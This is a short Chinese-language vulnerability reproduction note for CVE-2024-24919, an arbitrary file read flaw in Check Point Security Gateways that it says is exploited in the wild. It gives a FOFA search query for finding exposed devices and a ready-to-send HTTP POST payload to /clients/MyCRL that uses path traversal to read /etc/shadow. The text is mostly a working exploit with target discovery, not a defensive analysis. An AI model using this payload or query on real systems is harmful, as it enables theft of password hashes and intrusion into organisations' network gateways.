C12-1CheckPoint-安全网关-任意文件读取

漏洞描述：

Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用，远程攻击者可以通过构造恶意请求读取服务器上的任意文件，造成敏感信息的泄漏。目前，此漏洞已检测到在野利用。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。

网站图片：

fofa语法：

app=“Check_Point-SSL-Network-Extender”

漏洞复现：

payload：

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/./././/etc/shadow

效果图：